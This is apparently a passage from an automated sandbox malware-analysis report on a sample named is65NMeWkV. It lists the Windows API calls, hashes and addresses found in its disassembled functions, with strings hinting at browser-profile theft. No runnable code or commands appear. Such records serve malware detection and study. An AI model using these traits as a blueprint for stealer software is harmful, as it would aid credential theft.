                                      • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                      • Instruction Fuzzy Hash: 3C910172911218ABCB2CFBA4DD94DEE773AAF54301F50856DE506B6090EF346B48CF61
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                      • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                      • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                      • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230DA68
                                      • lstrlen.KERNEL32(00000000), ref: 0230DC06
                                      • lstrlen.KERNEL32(00000000), ref: 0230DC1A
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230DC99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                      • Instruction ID: 575f3f08d6f6f198a74bd1b103a97a984c35673926a5df42331f2b04e44816da
                                      • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                      • Instruction Fuzzy Hash: CF81FF72911218ABCB2CFBE4DDA4DEE773AAF54302F50456DE506A6090EF346B48CF61
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                      • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                      • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                      • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                      • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                      APIs
                                      • __scrt_initialize_crt.LIBCMT ref: 0232E562
                                        • Part of subcall function 0232E9F7: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 0232EA19
                                      • __scrt_acquire_startup_lock.LIBCMT ref: 0232E577
                                      • __scrt_release_startup_lock.LIBCMT ref: 0232E5E5
                                      • __scrt_get_show_window_mode.LIBCMT ref: 0232E638
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 1452418845-0
                                      • Opcode ID: f433eebb87c59b1dcdfb599205d54c5a618b0fa7a877a3c0b7a4b21b94478ba7
                                      • Instruction ID: e0f0a67fdf47515057fe50ada229ec39a890cdc9da4a0f4375ada8daeb440e76
                                      • Opcode Fuzzy Hash: f433eebb87c59b1dcdfb599205d54c5a618b0fa7a877a3c0b7a4b21b94478ba7
                                      • Instruction Fuzzy Hash: 3831E6307146648FEB29FB78C4A67B933D3EB55304F4445698487C76A2EF38A90DCB82
                                      APIs
                                      • memset.MSVCRT ref: 004194EB
                                        • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                        • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                        • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                      • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 396451647-0
                                      • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                      • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                      • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                      • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                      APIs
                                      • memset.MSVCRT ref: 02319752
                                        • Part of subcall function 02318FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02319785,00000000), ref: 02318FC2
                                        • Part of subcall function 02318FB7: RtlAllocateHeap.NTDLL(00000000), ref: 02318FC9
                                        • Part of subcall function 02318FB7: wsprintfW.USER32 ref: 02318FDF
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 02319812
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 02319830
                                      • CloseHandle.KERNEL32(00000000), ref: 0231983D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                      • Instruction ID: ef90e2540db10ef005a57f052a904c07e7efeb5588f9173b85eaf046084f1545
                                      • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                      • Instruction Fuzzy Hash: C93115B5A01248EFDB18DFE0CC58BEDB7B9EF49301F104459E506AA584DB74AA84CF51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                      • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                      • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • CloseHandle.KERNEL32(?), ref: 00418761
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                      • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                      • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                      • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 02318931
                                      • Process32First.KERNEL32(?,00000128), ref: 02318945
                                      • Process32Next.KERNEL32(?,00000128), ref: 0231895A
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • CloseHandle.KERNEL32(?), ref: 023189C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                      • Instruction ID: 56bfa6240ed9fd4714d0af949bed726ed3a5b6ee7ddd29131db46516e5760e5d
                                      • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                      • Instruction Fuzzy Hash: CD313071942218EBCB28DF94DD44FEEB779EF45701F104199E10AA61A0EB346F84CF91
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                      • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                      • lstrcatA.KERNEL32(?,008783B0), ref: 00414FAB
                                      • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                      • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                      • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                      • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                      • wsprintfA.USER32 ref: 00418850
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 2716131235-2206825331
                                      • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                      • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                      • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                      • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID:
                                      • API String ID: 3407564107-0
                                      • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                      • Instruction ID: 252d556d5c6503bea7a86d595231003ef4db52373114fc86c5cc8a44efdbca41
                                      • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                      • Instruction Fuzzy Hash: 61113AB4911209EFCB08DFE5D958AEDBBB9FF04305F108469E90A67290EB706B44CF65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                      • wsprintfA.USER32 ref: 004179F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 1243822799-0
                                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 02317C17
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317C1E
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 02317C2B
                                      • wsprintfA.USER32 ref: 02317C5A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction ID: 25d3bef9cd4dac2d5fbcd9aac53af656fd93c69197e2766fa7e067cb7d106143
                                      • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                      • Instruction Fuzzy Hash: FF1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 02317CCA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317CD1
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 02317CE4
                                      • wsprintfA.USER32 ref: 02317D1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction ID: 58bf3007dcb7f659fec3a10b0bca1451359ca58a4910c14d26c8bdc8431a8a9f
                                      • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                      • Instruction Fuzzy Hash: 46115EB1A45218EFEB248B54DC49FA9F7B8FB05721F10439AE51AA36C0C7745940CF51
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s
                                      • String ID:
                                      • API String ID: 3330995566-0
                                      • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                      • Instruction ID: 53e306d91f6aadc84df5cd2a7e38850a5149b49474581bfe7698364506e59881
                                      • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                      • Instruction Fuzzy Hash: EF1127B4E00209EFDB18CFE6E988BEEBBB9FB08705F10C029E425A6254D7749505CF55
                                      APIs
                                      • CreateFileA.KERNEL32(02313D55,80000000,00000003,00000000,00000003,00000080,00000000,?,02313D55,?), ref: 02319563
                                      • GetFileSizeEx.KERNEL32(000000FF,02313D55), ref: 02319580
                                      • CloseHandle.KERNEL32(000000FF), ref: 0231958E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction ID: 5794debf6e54f9f64280b7f69353a2070f3bdf2413b6755f5b7c7456ee20279b
                                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction Fuzzy Hash: 85F0493AE80208BBDB24DFF0DC59B9E77BAEB49720F10D654FA11A7280D635A6018B41
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02316D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 02316D60
                                      • Sleep.KERNEL32(00001770), ref: 02316D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D81
                                      • ExitProcess.KERNEL32 ref: 02316D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction ID: 16da8243f64f684c233975390da9303ae2bc6f472210fbf7fe4c6a1c8e193814
